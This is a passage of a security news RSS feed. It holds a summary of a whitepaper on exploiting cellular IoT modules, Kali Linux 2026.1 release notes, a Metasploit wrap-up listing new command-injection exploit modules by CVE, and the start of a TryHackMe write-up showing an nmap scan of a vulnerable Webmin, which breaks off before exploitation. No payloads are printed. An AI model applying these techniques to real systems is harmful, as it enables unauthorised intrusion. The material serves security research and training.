href="https://www.fortiguard.com/psirt/FG-IR-24-015">https://www.fortiguard.com/psirt/FG-IR-24-015</a></li><li><strong>CVE-2025–32433 (Erlang/OTP SSH)</strong> — Erlang security advisories: <a href="https://www.erlang.org/security">https://www.erlang.org/security</a></li><li><strong>“CVSS: A Scoring System or a Tool?”</strong> — Oren Yulevitch, CVSS SIG presentation</li><li><strong>“Enhancing National Cyber Resilience: CVSS v4.0 as a Regulatory Framework”</strong> — Rob Arnold, Acorn Pass / CVSS Associates (2025)</li><li><strong>Joint Advisory: Apache Log4j Vulnerability</strong> — CISA, FBI, NSA (December 2021): <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-356a">https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-356a</a></li><li><strong>CISA Advisory: Volt Typhoon</strong> (CVE-2024–21762 context): <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a">https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a</a></li></ol><h4><strong>Andrey Pautov</strong></h4><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=5b5a59728456" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/cvss-v4-0-the-practical-field-guide-for-vulnerability-management-5b5a59728456">CVSS v4.0: The Practical Field Guide for Vulnerability Management</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Whitepaper: Exploiting Cellular-based IoT Devices]]></title>
<description><![CDATA[Rapid7 has released a whitepaper titled “The Weaponization of Cellular Based IoT Technology,” by Deral Heiland, principal security researcher, IoT, at Rapid7, and Carlota Bindner, lead product security researcher at Thermo Fisher Scientific. The paper examines how attackers with physical access c...]]></description>
<link>https://tsecurity.de/de/3378044/it-security-nachrichten/new-whitepaper-exploiting-cellular-based-iot-devices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3378044/it-security-nachrichten/new-whitepaper-exploiting-cellular-based-iot-devices/</guid>
<pubDate>Tue, 24 Mar 2026 21:21:18 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>Rapid7 has released a whitepaper titled “</span><a href="https://assets.contentstack.io/v3/assets/blte4f029e766e6b253/blt95b4209e7219242b/69c250ab4e28d1ba21ec448b/The_weaponization_of_cellular_based_iot_technology.pdf" target="_blank"><span>The Weaponization of Cellular Based IoT Technology</span></a><span>,” by Deral Heiland, principal security researcher, IoT, at Rapid7, and Carlota Bindner, lead product security researcher at Thermo Fisher Scientific. The paper examines how attackers with physical access can exploit cellular modules in Internet of Things (IoT) devices to move into cloud and backend environments, exfiltrate data, and conceal command channels within expected device traffic. Heiland </span><a href="https://path.rsaconference.com/flow/rsac/us26/FullAgenda/page/catalog/session/1755402086556001fcjs" target="_blank"><span>presented their findings</span></a><span> at the RSAC 2026 conference in San Francisco.</span></p><p><span>The research focuses on how these attacks work in practice. It details how interchip communications such as USB and universal asynchronous receiver-transmitter (UART) can be observed and manipulated. It also shows how hardware modifications can replace a device host, allowing an external system to assume control of the cellular module. The authors developed proof-of-concept tools, including a TCP port scanner using AT commands, an S3 bucket enumerator, a SOCKS5 proxy that routes traffic through the cellular module, and a Metasploit proxy module. These examples demonstrate how attackers can take advantage of trusted relationships between devices and connected services.</span></p><p><span>The findings highlight consistent risks across tested devices. Cellular modules often expose multiple interfaces, and unused UART or USB paths can provide direct access. With targeted printed circuit board modifications, an attacker can reroute traffic through the cellular interface. Many modules accept AT commands that support raw sockets, HTTP requests, and TCP tunnels, which can enable reconnaissance and lateral movement. All cellular devices the researchers examined lacked tamper protections and most did not encrypt sensitive data before transmission, increasing exposure in environments that use private access point names (APNs).</span></p><p><span>Organizations should treat cellular-enabled devices as privileged entry points into their networks as well as their critical data storage and management environments. This includes disabling or removing unused interchip interfaces, enforcing end-to-end encryption before data is transmitted through the cellular modules, and applying monitoring and outbound controls within APN architectures. Hardware-level security testing should be part of standard product security practices.To read the whitepaper, click </span><a href="https://assets.contentstack.io/v3/assets/blte4f029e766e6b253/blt95b4209e7219242b/69c250ab4e28d1ba21ec448b/The_weaponization_of_cellular_based_iot_technology.pdf"><span>here</span></a><span>.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali Linux 2026.1 Release (2026 Theme & BackTrack Mode)]]></title>
<description><![CDATA[New year, new release - Kali 2026.1 is here! There is everything from a fresh coat of paint to a nod to our roots, with normal ongoing improvements.
Building on from December’s 2025.4, the summary of the changelog:

2026 Theme Refresh - Our yearly theme refresh
BackTrack Mode For Kali-Undercover ...]]></description>
<link>https://tsecurity.de/de/3378020/tools/kali-linux-20261-release-2026-theme-backtrack-mode/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3378020/tools/kali-linux-20261-release-2026-theme-backtrack-mode/</guid>
<pubDate>Tue, 24 Mar 2026 21:07:09 +0100</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>New year, new release - Kali 2026.1 is here! There is everything from a fresh coat of paint to a nod to our roots, with normal ongoing improvements.
Building on from <a href="https://www.kali.org/blog/kali-linux-2025-4-release/">December’s 2025.4</a>, the summary of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a>:</p>
<ul>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-1-release/#2026-theme-refresh">2026 Theme Refresh</a></strong> - Our yearly theme refresh</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-1-release/#backtrack-mode-for-kali-undercover">BackTrack Mode For Kali-Undercover</a></strong> - New mode celebrating BackTrack’s 20th anniversary</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-1-release/#kalis-13th-birthday-event">Kali’s 13th Birthday Event</a></strong> - A little community event</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-1-release/#new-tools-in-kali">New Tools</a></strong> - 8 new programs</li>
</ul>
<hr>
<h2>2026 Theme Refresh</h2>
<p>As with previous 20xx.1 releases, this major update brings our <strong>annual theme refresh</strong>, a long-standing tradition that keeps the Kali Linux interface as modern and innovative. This year’s release unveils a brand-new theme from the moment you boot. Everything from the <strong>boot menu, installer to the login display, and a fresh set of <a href="https://www.kali.org/wallpapers/">desktop wallpapers</a></strong>.</p>
<p><strong>Boot Animation</strong></p>
<p>The changes to the boot animation are subtle, but now the <strong>animation is fixed for live images</strong>, where it used to get stuck at the beginning, showing only the tail. It will also restart the loop in case the boot process takes longer, making it look smoother.</p>

<video class="video-shortcode" preload="none" autoplay muted loop>
<source src="https://www.kali.org/blog/kali-linux-2026-1-release/videos/kali-boot-splash-animation.mp4">
Your browser does not support the video tag.
</video>
<hr>
<p><strong>Boot Menu</strong></p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-1-release/images/kali-grub.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-1-release/images/kali-grub.png" alt="Kali 2026 Default Grub Boot Menu">
</a>
</p>

<hr>
<p><strong>Graphical Installer</strong></p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-1-release/images/kali-installer.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-1-release/images/kali-installer.png" alt="Kali 2026 Graphical Installer">
</a>
</p>

<hr>
<p><strong>Login</strong></p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-1-release/images/kali-login.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-1-release/images/kali-login.png" alt="Kali 2026 Default Login">
</a>
</p>

<hr>
<p><strong>Desktop</strong></p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-1-release/images/kali-desktop.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-1-release/images/kali-desktop.png" alt="Kali 2026 Default Desktop">
</a>
</p>

<hr>
<p><strong>Kali Purple Desktop</strong></p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-1-release/images/kali-desktop-purple.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-1-release/images/kali-desktop-purple.png" alt="Kali Purple 2026 Default Desktop">
</a>
</p>

<hr>
<p><strong>New Wallpapers</strong></p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-1-release/images/kali-wallpapers.jpg" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-1-release/images/kali-wallpapers.jpg" alt="New Kali Wallpapers For 2026">
</a>
</p>

<hr>
<h2>BackTrack Mode For Kali-Undercover</h2>
<p>2026 marks <strong>the 20th anniversary of <a href="https://www.backtrack-linux.org/">BackTrack Linux</a></strong>, the <a href="https://www.kali.org/docs/introduction/kali-linux-history/">predecessor to Kali</a>. To celebrate this milestone, we wanted to bring back some nostalgia for longtime users of this legendary cybersecurity distribution by adding a “BackTrack mode” to <code>kali-undercover</code>. This mode transforms the desktop to recreate the look and feel of BackTrack 5, with the same wallpaper, colors, and window themes.</p>
<p>You can run it directly from the menu or by running <code>kali-undercover --backtrack</code> in the terminal. You can switch back to the default Kali desktop (or not) by running it again.</p>
<video class="video-shortcode" preload="none" autoplay muted loop>
<source src="https://www.kali.org/blog/kali-linux-2026-1-release/videos/kali-backtrack-mode.mp4">
Your browser does not support the video tag.
</video>
<hr>
<p>Here is a screenshot of BackTrack 5, so you can compare it with our theme:</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-1-release/images/backtrack5-screenshot.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-1-release/images/backtrack5-screenshot.png" alt="BackTrack Linux 5r3">
</a>
</p>

<h2>Kali’s 13th Birthday Event</h2>
<p>Kali recently had our 13th birthday. To celebrate this, <a href="https://discord.kali.org/">our discord</a> had a little event and prize give away to mark the occasion.
Shout-out to the people who managed to solve it already:</p>
<ul>
<li>@AI Program</li>
<li>@Arszilla</li>
<li>@UltraStrawberryDream</li>
</ul>
<p>Even though the top 3 places and prizes have been claimed, we will keep it open for a little longer.
To help you get started, Kali is always getting <a href="https://www.kali.org/blog/kali-linux-2026-1-release/#new-tools-in-kali">new tools</a>, it can take some patience to learn about each of them.</p>
<blockquote>
<p>The Quieter You Become, The More You Are Able To Hear</p>
</blockquote>
<p><em>Thanks to @BeamOfOldLight and @cr4mb0 from the DAFreqs for creating the puzzles!</em></p>
<h2>New Tools in Kali</h2>
<p>It would not be a Kali release without some new tools!
Here is a quick rundown of the 8 new tools which have been added <em>(to the network repositories)</em>:</p>
<ul>
<li><a href="https://www.kali.org/tools/adaptixc2/">AdaptixC2</a> - Extensible post-exploitation and adversarial emulation framework</li>
<li><a href="https://www.kali.org/tools/atomic-operator/">Atomic-Operator</a> - Execute Atomic Red Team tests across multiple operating system environments</li>
<li><a href="https://www.kali.org/tools/fluxion/">Fluxion</a> - Security auditing and social-engineering research tool</li>
<li><a href="https://www.kali.org/tools/gef/">GEF</a> - Modern experience for GDB with advanced debugging capabilities</li>
<li><a href="https://www.kali.org/tools/metasploitmcp/">MetasploitMCP</a> - MCP server for Metasploit</li>
<li><a href="https://www.kali.org/tools/sstimap/">SSTImap</a> - Automatic SSTI detection tool with interactive interface</li>
<li><a href="https://www.kali.org/tools/wpprobe/">WPProbe</a> - Fast WordPress plugin enumeration tool</li>
<li><a href="https://www.kali.org/tools/xsstrike/">XSStrike</a> - Advanced XSS scanner</li>
</ul>
<p><em>There have been a total of 25 new packages, 9 removed, and 183 updates. On top of that, w also bump the Kali kernel to 6.18.</em></p>
<h2>Known Issues</h2>
<p>Bad news for users of the <code>kali-tools-sdr</code> metapackage (aka. Software Defined Radio): the GNU Radio ecosystem is not in great shape in this release. Tools like <code>gr-air-modes</code> or <code>gqrx-sdr</code> are known to be broken. Maybe other related tools as well. We expect it to be fixed in the next release though, so no need to panic!</p>
<h2>Kali NetHunter Updates</h2>
<p>We are starting this year fresh with some cleaning, providing improvements to the <a href="https://store.nethunter.com/packages/com.offsec.nethunter/">Kali NetHunter app</a>, such as the WPS scan bug, HID permission check, or the back button issue.</p>
<hr>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-1-release/images/nethunter-Redmi-Note-8-%28ginkgo%29.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-1-release/images/nethunter-Redmi-Note-8-%28ginkgo%29.png" alt="Redmi Note 8 (Ginkgo)">
</a>
</p>

<p><strong>Redmi Note 8 (Ginkgo)</strong></p>
<p>The <a href="https://nethunter.kali.org/device-kernels.html">Redmi Note 8</a> now has a <a href="https://nethunter.kali.org/kernels.html">new kernel</a> for <a href="https://nethunter.kali.org/android-versions.html">Android 16</a> by <a href="https://gitlab.com/ikteach">@ikteach</a>.</p>
<hr>
<p><strong>Wardriving with Samsung S10</strong></p>
<p>The Samsung S10 series are now even happier thanks to <a href="https://github.com/pr0misc">@Quazi Anwar</a>, his patch of <a href="https://github.com/pr0misc/Libnexmonkali-Plus">libnexmonkali</a> fixes the use of internal wireless firmware in Kali chroot. That means <a href="https://www.kali.org/tools/reaver/">reaver</a>, <a href="https://www.kali.org/tools/bully/">bully</a>, and even <a href="https://www.kali.org/tools/kismet/">kismet</a> is finally working!</p>
<hr>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-1-release/images/nethunter-honda.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-1-release/images/nethunter-honda.png" alt="NetHunter &amp; Civic Type-R">
</a>
</p>

<p><strong>KITT is alive and he is hacking all the things!</strong></p>
<p><a href="https://www.linkedin.com/in/kristopher-wilson-208b59123">Kristopher Wilson</a> has turned his <a href="https://www.linkedin.com/pulse/kitt-from-knight-rider-real-runs-nmap-kristopher-wilson-yycec">Civic Type-R into a pentesting tool using Kali NetHunter rootless on 4 wheels</a>.</p>
<p>And if AI is your thing, you can read what <a href="https://www.linkedin.com/pulse/i-built-ai-can-ssh-my-cars-head-unit-from-virtual-machine-wilson-plffc">he is done using that</a>.</p>
<hr>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-1-release/images/nethunter-wifi-injection-test2.jpg" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-1-release/images/nethunter-wifi-injection-test2.jpg" alt="QCACLD v3.0 Injection">
</a>
</p>

<p><strong>Wireless Injection on QCACLD-3.0</strong></p>
<p>Drumroll - the first working patch for injection is landed by <a href="https://github.com/Loukious">@Loukious</a> after several years! That will potentially unlock the ability to port the patch to most of phones that use Qualcomm chipsets. If you would like to try it on your kernel source, you can find <a href="https://github.com/Loukious/android_kernel_xiaomi_sm8150/commit/8f0698bf92abef517980fe9a84615cd8bad16622">the commit here</a>.</p>
<hr>
<p><strong>Kali NetHunter Podcast - Nexmon Team</strong></p>
<p>Meet the Nexmon team! The masters behind wireless injection on internal chipsets. If you ever wondered who are they, and how they started working on firmware reversing, <a href="https://gitlab.com/yesimxev">@yesimxev</a> had a great talk on episode 2 with <a href="https://www.linkedin.com/in/matthiasschulz1">@Matthias Schulz</a> and <a href="https://github.com/jlinktu">@Jakob Link</a>. We appreciate them for coming onto their first podcast ever! The session is also <a href="https://open.spotify.com/episode/46wU1TlAFHbwtCwEand6MX">available on Spotify</a> if you want to listen on the go.</p>
<div>

</div>
<h3>Kali Blog Recap</h3>
<p>Since our last release, we have published the following <a href="https://www.kali.org/blog/">blog posts</a>:</p>
<ul>
<li><a href="https://www.kali.org/blog/kali-llm-claude-desktop/">Kali &amp; LLM: macOS with Claude Desktop &amp; Anthropic Sonnet LLM</a></li>
<li><a href="https://www.kali.org/blog/kali-llm-ollama-5ire/">Kali &amp; LLM: Completely local with Ollama &amp; 5ire</a></li>
</ul>
<h2>Community Shout-Outs</h2>
<p>These are <strong>members of the community who have supported Kali</strong> and the team throughout the last release. We want to recognize and thank them for their contributions <em>(we believe in giving credit where it is due!)</em>:</p>
<p><strong>Packaging</strong>:</p>
<ul>
<li><a href="https://gitlab.com/Arszilla">@Arszilla</a> who has been helping with <a href="https://www.kali.org/tools/kali-meta/">kali-meta</a> and <a href="https://www.kali.org/tools/netexec/">netexec</a> </li>
<li><a href="https://gitlab.com/mambu020">@Giovanni Terranova</a> who has been helping with <a href="https://www.kali.org/tools/legion/">legion</a> </li>
<li><a href="https://gitlab.com/jloehel">@Jürgen</a> who has been helping with <a href="https://www.kali.org/tools/mcp-kali-server/">mcp-kali-server</a> </li>
<li><a href="https://gitlab.com/Shubhamvis98">@Shubham Vishwakarma</a> who has been helping with <a href="https://www.kali.org/tools/kali-meta/">kali-meta</a> </li>
</ul>
<p><strong>Kali Documentation</strong>:</p>
<ul>
<li><a href="https://gitlab.com/Chen-Yuanmeng">@Chen-Yuanmeng</a> </li>
<li><a href="https://gitlab.com/mr00k3">@mr00k3</a> </li>
<li><a href="https://gitlab.com/Simeon53424">@Simeon_YT</a> </li>
<li><a href="https://gitlab.com/Soroushnk80">@Soroush Nekoozadeh</a> </li>
</ul>
<p>Anyone and everyone is welcomed to get <a href="https://www.kali.org/docs/community/contribute/">involved</a>!</p>
<hr>
<p>@Tristram has a few words they would like to say:</p>
<blockquote>
<p>As a defender, my role centers on protecting organizations, strengthening systems, and continuously identifying opportunities for improvement. But effective security is not built by defenders alone. It is shaped through the combined efforts of both blue teamers and penetration testers, each bringing a different perspective to the same mission. Where one side looks to defend, the other works to challenge, expose gaps, and ultimately make those defenses stronger.</p>
<p>That relationship is critical. Penetration testers help uncover weaknesses before adversaries do, while defenders take those insights and turn them into actionable improvements. When that exchange is rooted in respect and a shared purpose, it creates a feedback loop that benefits the entire cybersecurity ecosystem. The result is not just better tools or processes, but a more resilient and adaptive security posture.</p>
<p>With that in mind, I want to call out @Aura and @Greenjam for their contributions to the Kali Linux Community. Their work represents the best of what this collaboration should look like. Through their willingness to share knowledge, support others, and contribute meaningfully to the community, they help bridge the gap between offensive and defensive security in a way that strengthens both sides.</p>
<p>In a field that is constantly evolving, it is this kind of collaboration and mindset that makes the difference. Whether you are on the blue team or working in an offensive role, we are all working toward the same goal. Contributions like theirs help ensure that we continue to learn from one another, improve together, and build a stronger, more unified cybersecurity community.</p>
<p>With love,</p>
<p>Tristram</p>
</blockquote>
<h3>New Kali Mirrors</h3>
<p>We welcomed <strong>4 new mirrors</strong> during this release cycle:</p>
<ul>
<li><strong>Azerbaijan</strong>: <a href="https://mirror.yer.az/kali/">mirror.yer.az</a>, sponsored by <a href="https://yer.az/">YER Hosting</a>.</li>
<li><strong>China</strong>: <a href="https://mirrors.qlu.edu.cn/kali/">mirrors.qlu.edu.cn</a>, sponsored by the <a href="https://www.qlu.edu.cn/">Qilu University of Technology</a> and thanks to 刘正阳.</li>
<li><strong>South Korea</strong>: <a href="https://mirror.wane.kr/kali/">mirror.wane.kr</a>, thanks to “@parkard” and “@kmw”.</li>
<li><strong>Spain</strong>: <a href="https://mirror.raiolanetworks.com/kali/">mirror.raiolanetworks.com</a>, sponsored by <a href="https://raiolanetworks.com/">Raiola Networks</a> and thanks to @Martin Gomez.</li>
</ul>
<p>If you have the disk space and bandwidth, <a href="https://www.kali.org/docs/community/setting-up-a-kali-linux-mirror/">we always welcome new mirrors</a>.</p>
<hr>
<h2>Get Kali Linux 2026.1</h2>
<p><strong>Fresh Images</strong>:
So what are you waiting for? Go <a href="https://www.kali.org/get-kali/">get Kali</a> already!</p>
<p>Seasoned Kali Linux users are already aware of this, but for those who are not, we also produce <strong><a href="https://cdimage.kali.org/kali-images/kali-weekly/">weekly builds</a></strong> that you can use. If you cannot wait for our next release and you want the latest packages <em>(or bug fixes)</em> when you download the image, you can just use the weekly image instead.
This way you will have fewer updates to do.
<em>Just know that these are automated builds that we do, not QA like we do for our standard <a href="https://www.kali.org/releases/">release images</a></em>. But we gladly take <a href="https://bugs.kali.org/">bug reports</a> about those images because we want any issues to be fixed before our next release!</p>
<p><strong>Existing Installs</strong>:
If you already have an existing Kali Linux installation, remember you can always do a quick <a href="https://www.kali.org/docs/general-use/updating-kali/">update</a>:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ echo "deb http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware" | sudo tee /etc/apt/sources.list
[...]
┌──(kali㉿kali)-[~]
└─$ sudo apt update &amp;&amp; sudo apt -y full-upgrade
[...]
┌──(kali㉿kali)-[~]
└─$ cp -vrbi /etc/skel/. ~/
[...]
┌──(kali㉿kali)-[~]
└─$ [ -f /var/run/reboot-required ] &amp;&amp; sudo reboot -f
</code></pre>
<p>You should now be on Kali Linux 2026.1. We can do a quick check by doing:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ grep VERSION /etc/os-release
VERSION="2026.1"
VERSION_ID="2026.1"
VERSION_CODENAME="kali-rolling"
┌──(kali㉿kali)-[~]
└─$ uname -v
#1 SMP PREEMPT_DYNAMIC Kali 6.18.12-1kali1 (2026-02-25)
┌──(kali㉿kali)-[~]
└─$ uname -r
6.18.12+kali-amd64
</code></pre>
<p><em>NOTE: The output of <code>uname -r</code> may be different depending on the system <a href="https://pkg.kali.org/pkg/linux">architecture</a>.</em></p>
<hr>
<p>As always, should you come across any bugs in Kali, please submit a report on our <a href="https://bugs.kali.org/">bug tracker</a>. <em>We will never be able to fix what we do not know is broken!</em> <strong>And Social networks are not bug trackers!</strong></p>
<hr>
<p>Want to keep up-to-date easier? We’ve got you!</p>
<ul>
<li><a href="https://www.kali.org/blog/">Blog</a>? Use our <a href="https://www.kali.org/rss.xml">RSS feed</a> and <a href="https://www.kali.org/newsletter/">newsletter</a> </li>
<li><a href="https://www.kali.org/get-kali/">Download</a>? We have a <a href="https://www.kali.org/torrents.xml">Torrent RSS feed</a></li>
<li><a href="https://www.kali.org/docs/community/list-of-official-kali-sites/#social-media-networks">Socials</a>? <a href="https://bsky.app/profile/kalilinux.bsky.social">Bluesky</a>, <a href="https://www.facebook.com/KaliLinux/">Facebook</a>, <a href="https://www.instagram.com/kalilinux/">Instagram</a>, <a href="https://infosec.exchange/@kalilinux">Mastodon</a> &amp; <a href="https://x.com/kalilinux">X</a></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 03/20/2026]]></title>
<description><![CDATA[♫ I Just Called ♫ To Say ♫ 7f45 4c46 0201 0100 0000 0000 0000 0000 0300 3e00 0100♫This release contains 2 new exploit modules, 2 enhancements, and 7 bug fixes. Community contributor Chocapikk submitted both exploit modules this release: one targeting AVideo-Encoder’s getImage.php file and another...]]></description>
<link>https://tsecurity.de/de/3367949/it-security-nachrichten/metasploit-wrap-up-03202026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3367949/it-security-nachrichten/metasploit-wrap-up-03202026/</guid>
<pubDate>Fri, 20 Mar 2026 21:20:59 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>♫ I Just Called ♫ To Say ♫ 7f45 4c46 0201 0100 0000 0000 0000 0000 0300 3e00 0100♫</h2><p>This release contains 2 new exploit modules, 2 enhancements, and 7 bug fixes. Community contributor Chocapikk submitted both exploit modules this release: one targeting AVideo-Encoder’s getImage.php file and another targeting FreePBX. Leading the enhancements is a granularization for LDAP queries allowing the omission of SACL data on security descriptors, as without the proper permissions the entire query of the security descriptor will fail if the SACL data is even just a part of the query.</p><h2>New module content (2)</h2><h3>AVideo Encoder getImage.php Unauthenticated Command Injection</h3><p>Authors: Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a> and arkmarta</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21076">#21076</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a></p><p>Path: linux/http/avideo_encoder_getimage_cmd_injection</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-29058&amp;referrer=blog">CVE-2026-29058</a></p><p>Description: Adds an exploit module for CVE-2026-29058, an unauthenticated OS command injection in AVideo Encoder's getImage.php endpoint.</p><h3>FreePBX filestore authenticated command injection</h3><p>Authors: Cory Billington and Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a></p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20719">#20719</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a></p><p>Path: unix/http/freepbx_filestore_cmd_injection</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-64328&amp;referrer=blog">CVE-2025-64328</a></p><p>Description: Adds a new Metasploit exploit module for FreePBX filestore authenticated command injection (CVE-2025-64328) with automatic vulnerable-version detection and full documentation, and renames the XorcomCompletePbx HTTP mixin to CompletePBX updating affected modules accordingly.</p><h2>Enhancements and features (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20730">#20730</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - This update modifies the ldap_query module to skip querying the SACL (System Access Control List) on security descriptors by default. This behavior is now controlled by a new option, LDAP::QuerySacl. This change is necessary when using a non-privileged user to query security descriptors via LDAP; otherwise, querying the SACL will cause the entire query to be blocked, resulting in no security descriptors being returned.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20997">#20997</a> from <a href="https://github.com/Nayeraneru">Nayeraneru</a> - This adds a new OptTimedelta datastore option type. It enables module authors to specify a time duration and users to set it with a human-friendly syntax.</li></ul><h2>Bugs fixed (7)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20960">#20960</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - This adds a DHCPINTERFACE option to the DHCP server mixin, allowing modules that start that server to specify a particular interface to bind to.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21020">#21020</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - This makes a small change to the docs by removing two lines that were previously duplicated.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21024">#21024</a> from <a href="https://github.com/Aaditya1273">Aaditya1273</a> - Fixes a bug in the JSON-RPC msfrpcd functionality that incorrectly required SSL certificates to be present even when disabled with msfrpcd -S.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21025">#21025</a> from <a href="https://github.com/Hemang360">Hemang360</a> - Fixes a crash when calling the HTTP cookie jar with non-string values.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21028">#21028</a> from <a href="https://github.com/SilentSobs">SilentSobs</a> - Fixes a crash when using the reload_all command no module is present.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21081">#21081</a> from <a href="https://github.com/Hemang360">Hemang360</a> - Fixes a crash when using the windows/exec with non-ascii characters.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21139">#21139</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - This fixes a bug in the ldap_esc_vulnerable_cert_finder module that was preventing authentication from working when making a WinRM connection.</li></ul><h2>Documentation added (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21074">#21074</a> from <a href="https://github.com/jeanmtr">jeanmtr</a> - Adds documentation for the pop3_login module.</li></ul><p>You can always find more documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-03-10T20%3A31%3A01Z..2026-03-18T23%3A56%3A12Z%22">Pull Requests 6.4.122...6.4.123</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.122...6.4.123">Full diff 6.4.122...6.4.123</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Source THM Box Writeup]]></title>
<description><![CDATA[In Every Penetration testing engagement we start with recon, thereby we start by scanning the target for open ports.I tried the full scan and found two open ports :SSH = 22Webmin = 10000Scanning port 10000after that lets do a service scan for this port to see what service is running :nmap -sC -sV...]]></description>
<link>https://tsecurity.de/de/3365751/hacking/source-thm-box-writeup/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3365751/hacking/source-thm-box-writeup/</guid>
<pubDate>Fri, 20 Mar 2026 06:35:09 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In Every Penetration testing engagement we start with recon, thereby we start by scanning the target for open ports.</p><p>I tried the full scan and found two open ports :</p><p>SSH = 22<br>Webmin = 10000</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/565/1*UbLZkYb5kKaAA5i9SHILZA.png"><figcaption>Scanning port 10000</figcaption></figure><p>after that lets do a service scan for this port to see what service is running :</p><p>nmap -sC -sV -p 10000 10.10.14.207 -oA servicewebmin</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/758/1*ps14NWY4foQm9H9jNLz3aw.png"><figcaption>Service Scan of the Port.</figcaption></figure><p>if we look closer we can find that port 10000 has Webmin httpd, it’s version is 1.890 which seems vulnerable to a known exploit.</p><p>lets search with searchsploit to see if the exploit is available in exploitdb.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/728/1*Pn3A3On4DGn5IKpxT0De7g.png"><figcaption>Searching ExploitDB with SearchSploit.</figcaption></figure><p>We can clearly find that there is an exploit for this version, lets use metasploit get a shell on the box.</p><figure><img alt="" 